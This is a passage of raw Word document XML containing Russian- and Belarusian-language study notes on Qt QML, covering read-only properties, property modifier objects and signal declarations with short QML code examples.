          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00547877" w:rsidRPr="00D815C8" w:rsidRDefault="00547877" w:rsidP="00F15C30">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="00B050"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00760A8C" w:rsidRPr="00D815C8" w:rsidRDefault="00760A8C" w:rsidP="00CF5106">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="25" w:name="_Toc483603879"/>
      <w:bookmarkStart w:id="26" w:name="_Toc483605099"/>
      <w:r w:rsidRPr="003D69BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Readonly</w:t>
      </w:r>
      <w:r w:rsidRPr="003D69BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003D69BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>свойство</w:t>
      </w:r>
      <w:bookmarkEnd w:id="25"/>
      <w:bookmarkEnd w:id="26"/>
    </w:p>
    <w:p w:rsidR="00760A8C" w:rsidRPr="00D815C8" w:rsidRDefault="00760A8C" w:rsidP="00F15C30">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve">Аналаг канстантных пераменных у </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>qt</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F91167" w:rsidRPr="00D815C8" w:rsidRDefault="00F91167" w:rsidP="00F15C30">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Note:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">A read-only property </w:t>
      </w:r>
      <w:r w:rsidRPr="00CF5106">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cannot also be a</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF5106">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId10" w:anchor="default-properties" w:history="1">
        <w:r w:rsidRPr="00CF5106">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>default</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00CF5106">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CF5106">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>property</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F91167" w:rsidRPr="00D815C8" w:rsidRDefault="00F91167" w:rsidP="00CF5106">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="27" w:name="_Toc483603880"/>
      <w:bookmarkStart w:id="28" w:name="_Toc483605100"/>
      <w:r w:rsidRPr="003D69BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Property modifier objects</w:t>
      </w:r>
      <w:bookmarkEnd w:id="27"/>
      <w:bookmarkEnd w:id="28"/>
    </w:p>
    <w:p w:rsidR="00F91167" w:rsidRPr="00D815C8" w:rsidRDefault="00F91167" w:rsidP="00F91167">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&lt;PropertyModifierTypeName&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="000D7D84">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>on</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;propertyName&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F91167" w:rsidRPr="00D815C8" w:rsidRDefault="00F91167" w:rsidP="00F91167">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 attributes of the object instance</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F91167" w:rsidRPr="00D815C8" w:rsidRDefault="00F91167" w:rsidP="00F91167">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F91167" w:rsidRPr="00D815C8" w:rsidRDefault="00F91167" w:rsidP="00F15C30">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="00B050"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pP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The behavior of a property modifier type when associated with a particular property type is defined by its implementation.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F91167" w:rsidRPr="00D815C8" w:rsidRDefault="000C78F9" w:rsidP="00CF5106">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="29" w:name="_Toc483603881"/>
      <w:bookmarkStart w:id="30" w:name="_Toc483605101"/>
      <w:r w:rsidRPr="003D69BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Сигналы</w:t>
      </w:r>
      <w:bookmarkEnd w:id="29"/>
      <w:bookmarkEnd w:id="30"/>
    </w:p>
    <w:p w:rsidR="00226C1D" w:rsidRPr="00D815C8" w:rsidRDefault="005A6BBD" w:rsidP="00F15C30">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Сигнал – это </w:t>
      </w:r>
      <w:r w:rsidRPr="00CF5106">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>уведомления</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> от </w:t>
      </w:r>
      <w:r w:rsidR="00085476" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>объект</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">а, что некоторое </w:t>
      </w:r>
      <w:r w:rsidRPr="00CF5106">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>событие произошло</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00085476" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Объект</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> может быть уведомлён через </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>обработчик сигналов</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. В блоке обработчика должен содержаться код </w:t>
      </w:r>
      <w:r w:rsidR="004E4201" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">java </w:t>
      </w:r>
      <w:r w:rsidR="007F74BB" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>script</w:t>
      </w:r>
      <w:r w:rsidR="00226C1D" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, который следует выполнить.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00226C1D" w:rsidRPr="00D815C8" w:rsidRDefault="005A6BBD" w:rsidP="00F15C30">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Сигнал может быть определён для типа </w:t>
      </w:r>
      <w:r w:rsidRPr="00CF5106">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>С++</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> при помощи регистрирования </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Q</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SIGNAL</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> класса, который затем </w:t>
      </w:r>
      <w:r w:rsidRPr="00CF5106">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">регистрируется при помощи системы </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">типов </w:t>
      </w:r>
      <w:r w:rsidR="009B0257" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>qml</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</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QtQuick</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55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>2.0</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Item</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signal clicked</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signal hovered()</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signal actionPerformed(</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>string</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> action, </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>var</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> actionResult)</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eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005A6BBD" w:rsidRPr="00D815C8" w:rsidRDefault="008A25E2" w:rsidP="00F15C30">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Д</w:t>
      </w:r>
      <w:r w:rsidR="005A6BBD" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>ля испускания сигнала</w:t>
      </w:r>
      <w:r w:rsidR="005A6BBD" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> его следует </w:t>
      </w:r>
      <w:r w:rsidR="005A6BBD" w:rsidRPr="00CF5106">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>запросить как метод</w:t>
      </w:r>
      <w:r w:rsidR="005A6BBD" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009B0257" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Qml</w:t>
      </w:r>
      <w:r w:rsidR="005A6BBD" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> типы также обеспечивают </w:t>
      </w:r>
      <w:r w:rsidR="005A6BBD" w:rsidRPr="00CF5106">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>встроенные сигналы изменения свойства</w:t>
      </w:r>
      <w:r w:rsidR="005A6BBD" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, которые испускаются всякий раз, как свойство изменяется.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005A6BBD" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Добавление сигнала в определение </w:t>
      </w:r>
      <w:r w:rsidR="00085476" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>объект</w:t>
      </w:r>
      <w:r w:rsidR="005A6BBD" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">а в </w:t>
      </w:r>
      <w:r w:rsidR="009B0257" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>qml</w:t>
      </w:r>
      <w:r w:rsidR="005A6BBD" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005A6BBD" w:rsidRPr="00CF5106">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>автоматически добавит связанный обработчик сигналов</w:t>
      </w:r>
      <w:r w:rsidR="005A6BBD" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> к определению </w:t>
      </w:r>
      <w:r w:rsidR="00085476" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>объект</w:t>
      </w:r>
      <w:r w:rsidR="005A6BBD" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>а, который, по умолчанию, будет пуст.</w:t>
      </w:r>
    </w:p>
